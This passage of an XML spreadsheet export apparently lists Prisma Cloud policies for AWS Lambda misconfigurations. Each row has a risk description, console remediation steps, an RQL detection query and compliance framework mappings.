          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1990" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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90" t="inlineStr">
        <is>
          <t>78200cd2-8f14-487e-8b52-28192e1a8e9e</t>
        </is>
      </c>
      <c r="AI1990" t="inlineStr">
        <is>
          <t>2d7edd2a-7d2e-43ae-82fd-a77eb8db593f</t>
        </is>
      </c>
      <c r="AJ1990" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1990" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1991">
      <c r="A1991" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, HIPAA, ISO/IEC 27001:2022, NIST 800-53 Rev 5, CIS Controls v8.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, HIPAA, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), SOC 2, SOC 2, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, CIS Controls v8.1, ISO/IEC 27001:2022, NIST 800-53 Rev 5, ISO/IEC 27001:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1991" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1991" s="2" t="inlineStr"/>
      <c r="D1991" t="inlineStr"/>
      <c r="E1991" t="inlineStr"/>
      <c r="F1991" t="inlineStr"/>
      <c r="G1991" t="b">
        <v>1</v>
      </c>
      <c r="H19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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1991" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1991" t="inlineStr">
        <is>
          <t>AWS Lambda execution role having overly permissive inline policy</t>
        </is>
      </c>
      <c r="L1991" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1991" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1991" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1991" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1991" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1991" t="inlineStr">
        <is>
          <t>Principle 6</t>
        </is>
      </c>
      <c r="R1991" t="inlineStr">
        <is>
          <t>6.2</t>
        </is>
      </c>
      <c r="S1991" t="inlineStr"/>
      <c r="T1991" t="b">
        <v>0</v>
      </c>
      <c r="U1991" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1991" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W1991" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Function execution role having overly permissive inline policy embedded. Lambda functions having overly permissive policy could lead to lateral movement in account or privilege being escalated when compromised. It is highly recommended to have the least privileged access policy to protect the Lambda Functions from unauthorized access.</t>
        </is>
      </c>
      <c r="X1991" t="inlineStr">
        <is>
          <t>Refer to the following URL to give fine-grained and restrictive permissions to IAM Role Inline Policy:
https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_manage-edit.html#edit-inline-policy-console</t>
        </is>
      </c>
      <c r="Y1991" t="inlineStr"/>
      <c r="Z1991" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-lambda-list-functions' as X; config from cloud.resource where api.name = 'aws-iam-list-roles' AND json.rule = inlinePolicies[*].policyDocument.Statement[?any(Effect equals Allow and (Action equals "*" or Action contains :* or Action[*] contains :*) and (Resource equals "*" or Resource[*] anyStartWith "*"))] exists as Y; filter '$.X.role equals $.Y.role.arn'; show Y;</t>
        </is>
      </c>
      <c r="AA1991" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1991" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1991" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-887</t>
        </is>
      </c>
      <c r="AD1991" t="b">
        <v>1</v>
      </c>
      <c r="AE1991" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1991" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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1" t="inlineStr">
        <is>
          <t>b9e2b957-3f3d-459e-99d8-b90b61f57bcf</t>
        </is>
      </c>
      <c r="AI1991" t="inlineStr">
        <is>
          <t>19faa134-fda3-4978-af4a-7a383adf54cd</t>
        </is>
      </c>
      <c r="AJ1991" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1991" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1992">
      <c r="A1992" t="inlineStr"/>
      <c r="B1992" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1992" s="2" t="inlineStr"/>
      <c r="D1992" t="inlineStr"/>
      <c r="E1992" t="inlineStr"/>
      <c r="F1992" t="inlineStr"/>
      <c r="G1992" t="b">
        <v>1</v>
      </c>
      <c r="H19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92" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1992" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1992" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed unauthenticated AWS Lambda function with iam:PassRole and Redshift Cluster Creation permissions</t>
        </is>
      </c>
      <c r="L1992" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE,DATA_EXFILTRATION</t>
        </is>
      </c>
      <c r="M1992" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1992" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1992" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1992" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1992" t="inlineStr"/>
      <c r="R1992" t="inlineStr"/>
      <c r="S1992" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1992" t="b">
        <v>0</v>
      </c>
      <c r="U1992" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1992" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W1992" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed unauthenticated AWS Lambda functions with iam:PassRole and Redshift Cluster creation permissions.
AuthType determines how Lambda authenticates or authorises requests to your function URL. When AuthType is set to NONE, Lambda doesn't perform any authentication before invoking your function. A publicly accessible Lambda function could allow malicious actors to gain initial access and create a Redshift cluster with any role, enabling them to escalate their permissions by attaching a privileged role to the endpoint and configuring authentication to the endpoint using a key they control.
This policy checks for the following permissions:
'redshift:CreateCluster', 'iam:PassRole'.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1992" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Function service
3. Find the resource-based policy of the AWS Lambda Function resource
4. Update the 'Principal' section of the policy to avoid public access
[PERMISSION]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the Lambda Function
3. Select the 'Permissions' section under the 'Configuration' tab
4. Navigate to the IAM Role by clicking on the Role name
5. Under 'Permissions policies', find the relevant policy according to the alert details and remove the risky actions
[MISCONFIGURATION]
1. Sign in to the AWS console
2. Select the region from the region drop-down for which the alert is generated
3. Navigate to the AWS Lambda Dashboard
4. Click on 'Functions' (Left panel)
5. Select the lambda function for which the alert is generated
6. Go to the 'Configuration' tab
7. Select 'Function URL'
8. Click on 'Edit'
9. Set 'Auth type' to 'AWS_IAM'
10. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y1992" t="inlineStr"/>
      <c r="Z1992" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-lambda-list-functions' ) and finding.name contains all ('Publicly Executable Lambda','AWS Lambda function URL AuthType set to NONE','AWS Lateral Movement to Data Services Through Redshift Cluster Creation')</t>
        </is>
      </c>
      <c r="AA1992" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1992" t="inlineStr">
        <is>
          <t>2024-08-19 06:33:21</t>
        </is>
      </c>
      <c r="AC1992" t="inlineStr"/>
      <c r="AD1992" t="b">
        <v>1</v>
      </c>
      <c r="AE1992" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1992" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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92" t="inlineStr">
        <is>
          <t>5eb9102f-5068-48a9-8185-acd92c444b30</t>
        </is>
      </c>
      <c r="AI1992" t="inlineStr">
        <is>
          <t>1b008df2-0792-411b-b9e1-17d0d2c2c5ca</t>
        </is>
      </c>
      <c r="AJ1992" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1992" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1993">
      <c r="A1993" t="inlineStr"/>
      <c r="B1993" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1993" s="2" t="inlineStr"/>
      <c r="D1993" t="inlineStr"/>
      <c r="E1993" t="inlineStr"/>
      <c r="F1993" t="inlineStr"/>
      <c r="G1993" t="b">
        <v>1</v>
      </c>
      <c r="H19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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1993" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1993" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) risk due to publicly exposed and vulnerable AWS Lambda function [Node.js, CVE-2021-21315]</t>
        </is>
      </c>
      <c r="L1993" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1993" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1993" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1993" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1993" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1993" t="inlineStr"/>
      <c r="R1993" t="inlineStr"/>
      <c r="S1993" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1993" t="b">
        <v>0</v>
      </c>
      <c r="U1993" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1993" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W1993" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions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AWS Lambda function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Node.js [CVE-2021-21315] vulnerability and public exposure reported for the AWS Lambda function as soon as possible.</t>
        </is>
      </c>
      <c r="X1993"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1993" t="inlineStr"/>
      <c r="Z1993" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda') AND with : (Vuln WHERE id IN ('CVE-2021-21315'))</t>
        </is>
      </c>
      <c r="AA1993" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1993" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:57</t>
        </is>
      </c>
      <c r="AC1993" t="inlineStr"/>
      <c r="AD1993" t="b">
        <v>1</v>
      </c>
      <c r="AE1993" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1993" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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3" t="inlineStr">
        <is>
          <t>1f9ded39-2977-4be2-914f-7311fd3a6fb3</t>
        </is>
      </c>
      <c r="AI1993" t="inlineStr">
        <is>
          <t>6e13dd18-d118-4fa5-aeeb-62172fce8487</t>
        </is>
      </c>
      <c r="AJ1993" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1993" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1994">
      <c r="A1994" t="inlineStr"/>
      <c r="B1994" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1994" s="2" t="inlineStr"/>
      <c r="D1994" t="inlineStr"/>
      <c r="E1994" t="inlineStr"/>
      <c r="F1994" t="inlineStr"/>
      <c r="G1994" t="b">
        <v>1</v>
      </c>
      <c r="H19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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1994" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1994" t="inlineStr">
        <is>
          <t>Unauthorized account access risk through a publicly exposed AWS Lambda function with no authentication and excessive IAM permissions</t>
        </is>
      </c>
      <c r="L1994" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,MISCONFIGURATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1994" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1994" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1994" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1994" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1994" t="inlineStr"/>
      <c r="R1994" t="inlineStr"/>
      <c r="S1994" t="inlineStr">
        <is>
          <t>attackpath,marclabel,new_label,Prisma_Cloud,SEC-01-01,vstoyko : test</t>
        </is>
      </c>
      <c r="T1994" t="b">
        <v>0</v>
      </c>
      <c r="U1994" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1994" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W1994" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Function that are publicly exposed through resource based policies with URL AuthType set to NONE and have high level IAM permissions.
AuthType determines how Lambda authenticates or authorises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further help the attackers to perform unauthorised actions in the cloud account. Granting high-level permissions to the function can further help the attackers to perform unauthorized actions, privilege escalation or lateral movements in the cloud account.
Immediate attention is required to configure Lambda function authentication type to AWS_IAM and remove unwanted permissions assigned to the Lambda function. Restrict public exposure reported for the Lambda Function as soon as possible.</t>
        </is>
      </c>
      <c r="X1994"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[PERMISSION]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1994" t="inlineStr"/>
      <c r="Z1994" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-lambda-list-functions') and finding.name = (('Publicly Executable Lambda' and 'AWS Lambda function URL AuthType set to NONE') and ('(Disabled) AWS Lambda Function with IAM write permissions' or 'AWS Lambda Function with IAM policy management permissions' or 'AWS Lambda Function with AWS Organization management permissions'))</t>
        </is>
      </c>
      <c r="AA1994" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1994" t="inlineStr">
        <is>
          <t>2024-04-24 17:11:41</t>
        </is>
      </c>
      <c r="AC1994" t="inlineStr"/>
      <c r="AD1994" t="b">
        <v>1</v>
      </c>
      <c r="AE1994" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1994" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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4" t="inlineStr">
        <is>
          <t>ca524b38-306c-4482-8700-b3717189003b</t>
        </is>
      </c>
      <c r="AI1994" t="inlineStr">
        <is>
          <t>69117374-3153-49ff-85b7-949c68b8cca3</t>
        </is>
      </c>
      <c r="AJ1994" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1994" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1995">
      <c r="A1995" t="inlineStr"/>
      <c r="B1995" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1995" s="2" t="inlineStr"/>
      <c r="D1995" t="inlineStr"/>
      <c r="E1995" t="inlineStr"/>
      <c r="F1995" t="inlineStr"/>
      <c r="G1995" t="b">
        <v>1</v>
      </c>
      <c r="H19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1995" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1995" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1995" t="inlineStr">
        <is>
          <t>Privilege escalation and lateral movement risk due to a publicly exposed AWS Lambda function with lateral movement finding to admin in another account</t>
        </is>
      </c>
      <c r="L1995" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1995" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1995" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1995" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1995" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1995" t="inlineStr"/>
      <c r="R1995" t="inlineStr"/>
      <c r="S1995" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1995" t="b">
        <v>0</v>
      </c>
      <c r="U1995" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1995" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W1995" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda functions that are publicly exposed with lateral movement finding to admin in another account.
Publicly exposed Lambda function could allow malicious actors to get initial access to the lambda function. An attacker's access to lambda function with lateral movement finding to admin in another account could allow them to escalate privileges through the lambda function, enabling them to move laterally and carry out unauthorized actions in the other cloud account by leveraging assumed administrative permissions.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1995" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Function service
3. Find the resource-based policy of the AWS Lambda Function resource
4. Update the 'Principal' section of the policy to avoid public access
[PERMISSION]
In order to remove any administrative permissions and minimize trusted entities which can assume the role, use the following remediation steps:
1. Browse to the privileged role ("Destination") in the AWS Console
2. Select "Trust relationships"-&gt;"Edit trust policy"
3. Modify the role's trust relationship as per requirements
4.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1995" t="inlineStr"/>
      <c r="Z1995" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda','Compute resource can assume a Service Account with admin privileges in another account')</t>
        </is>
      </c>
      <c r="AA1995" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1995" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:26</t>
        </is>
      </c>
      <c r="AC1995" t="inlineStr"/>
      <c r="AD1995" t="b">
        <v>1</v>
      </c>
      <c r="AE1995" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1995" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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1995" t="inlineStr">
        <is>
          <t>aa7ab68f-7d8d-4d09-99d0-a47c023a3c90</t>
        </is>
      </c>
      <c r="AI1995" t="inlineStr">
        <is>
          <t>6b0603ca-79d1-4433-9884-6d05042960cf</t>
        </is>
      </c>
      <c r="AJ1995" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1995" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1996">
      <c r="A1996" t="inlineStr"/>
      <c r="B1996" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1996" s="2" t="inlineStr"/>
      <c r="D1996" t="inlineStr"/>
      <c r="E1996" t="inlineStr"/>
      <c r="F1996" t="inlineStr"/>
      <c r="G1996" t="b">
        <v>1</v>
      </c>
      <c r="H19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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1996" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1996" t="inlineStr">
        <is>
          <t>Data breach risk due to a publicly exposed and unauthenticated AWS Lambda function with Amazon RDS database SQL query execution permissions</t>
        </is>
      </c>
      <c r="L1996" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1996" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1996" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1996" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1996" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1996" t="inlineStr"/>
      <c r="R1996" t="inlineStr"/>
      <c r="S1996" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1996" t="b">
        <v>0</v>
      </c>
      <c r="U1996" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1996" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W1996" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Function that is publicly exposed through resource based policies with URL AuthType set to NONE and has SQL query execution permissions for the Amazon RDS database.
AuthType determines how Lambda authenticates or authorizes requests to your function URL. When AuthType is set to NONE, Lambda doesn't perform any authentication before invoking your function. Lambda function publicly accessible from the internet could allow malicious actors to get initial access to the lambda function and an unauthenticated Lambda Function further help the attackers to perform unauthorized actions in the cloud account. Granting SQL query execution permissions to the function can further help the attackers to perform unauthorized modifications or unauthorized access to sensitive information stored in the databases which could lead to potential data breaches.
Immediate attention is required to configure the Lambda function authentication type to AWS_IAM and remove unwanted permissions assigned to the Lambda function. Restrict public exposure reported for the Lambda Function as soon as possible.</t>
        </is>
      </c>
      <c r="X1996" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Function service
3. Find resource-based policy of the AWS Lambda Function resource
4. Update the 'Principal' section of the policy to avoid public access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t>
        </is>
      </c>
      <c r="Y1996" t="inlineStr"/>
      <c r="Z1996" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda','AWS Lambda function URL AuthType set to NONE','AWS Lambda with IAM role with Amazon RDS database SQL query execution permissions')</t>
        </is>
      </c>
      <c r="AA1996" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1996" t="inlineStr">
        <is>
          <t>2023-08-21 06:18:29</t>
        </is>
      </c>
      <c r="AC1996" t="inlineStr"/>
      <c r="AD1996" t="b">
        <v>1</v>
      </c>
      <c r="AE1996" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1996" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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6" t="inlineStr">
        <is>
          <t>bcc4d1df-a469-4731-add8-418908fc64e0</t>
        </is>
      </c>
      <c r="AI1996" t="inlineStr">
        <is>
          <t>e4b1e600-e7eb-4764-9683-cbb6c32ba2b4</t>
        </is>
      </c>
      <c r="AJ1996" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1996" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1997">
      <c r="A1997" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, HIPAA, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, NIST 800-53 Rev 5, CIS Controls v8.1, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2022.2.1, HIPAA, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), SOC 2, SOC 2, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, CSA CCM v4.0.12, CIS Controls v8.1, ISO/IEC 27001:2022, NIST 800-53 Rev 5, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1997" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1997" s="2" t="inlineStr"/>
      <c r="D1997" t="inlineStr"/>
      <c r="E1997" t="inlineStr"/>
      <c r="F1997" t="inlineStr"/>
      <c r="G1997" t="b">
        <v>1</v>
      </c>
      <c r="H19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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1997" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1997" t="inlineStr">
        <is>
          <t>AWS IAM policy attached to AWS Lambda execution role is overly permissive</t>
        </is>
      </c>
      <c r="L1997" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1997" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1997" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1997" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1997" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1997" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R1997" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S1997" t="inlineStr"/>
      <c r="T1997" t="b">
        <v>0</v>
      </c>
      <c r="U1997" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1997" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W1997" t="inlineStr">
        <is>
          <t>This policy identifies Lambda Functions execution role having overly permissive IAM policy attached to it. Lambda functions having overly permissive policy could lead to lateral movement in account or privilege being escalated when compromised. It is highly recommended to have the least privileged access policy to protect the Lambda Functions from unauthorized access.</t>
        </is>
      </c>
      <c r="X1997" t="inlineStr">
        <is>
          <t>Refer to the following URL to give fine-grained and restrictive permissions to IAM Policy:
https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_manage-edit.html#edit-managed-policy-console</t>
        </is>
      </c>
      <c r="Y1997" t="inlineStr"/>
      <c r="Z1997" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-lambda-list-functions' as X; config from cloud.resource where api.name = 'aws-iam-list-roles' as Y; config from cloud.resource where api.name = 'aws-iam-get-policy-version' AND json.rule = isAttached is true and document.Statement[?any(Effect equals Allow and (Action equals "*" or Action contains :* or Action[*] contains :*) and (Resource equals "*" or Resource[*] anyStartWith "*") and Condition does not exist)] exists as Z; filter '$.X.role equals $.Y.role.arn and $.Y.attachedPolicies[*].policyName equals $.Z.policyName'; show Z;</t>
        </is>
      </c>
      <c r="AA1997" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1997" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1997" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-886</t>
        </is>
      </c>
      <c r="AD1997" t="b">
        <v>1</v>
      </c>
      <c r="AE1997" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1997" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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7" t="inlineStr">
        <is>
          <t>ce344087-112e-41d2-b55e-d9188f45fcc1</t>
        </is>
      </c>
      <c r="AI1997" t="inlineStr">
        <is>
          <t>63bdc11a-e50e-42e9-9f47-cdb60c507b60</t>
        </is>
      </c>
      <c r="AJ1997" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1997" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1998">
      <c r="A1998" t="inlineStr"/>
      <c r="B1998" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1998" s="2" t="inlineStr"/>
      <c r="D1998" t="inlineStr"/>
      <c r="E1998" t="inlineStr"/>
      <c r="F1998" t="inlineStr"/>
      <c r="G1998" t="b">
        <v>1</v>
      </c>
      <c r="H19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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1998" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1998" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) risk due to a publicly exposed (via resource based policies) AWS Lambda Function with Spring4Shell vulnerability</t>
        </is>
      </c>
      <c r="L1998" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1998" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1998" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
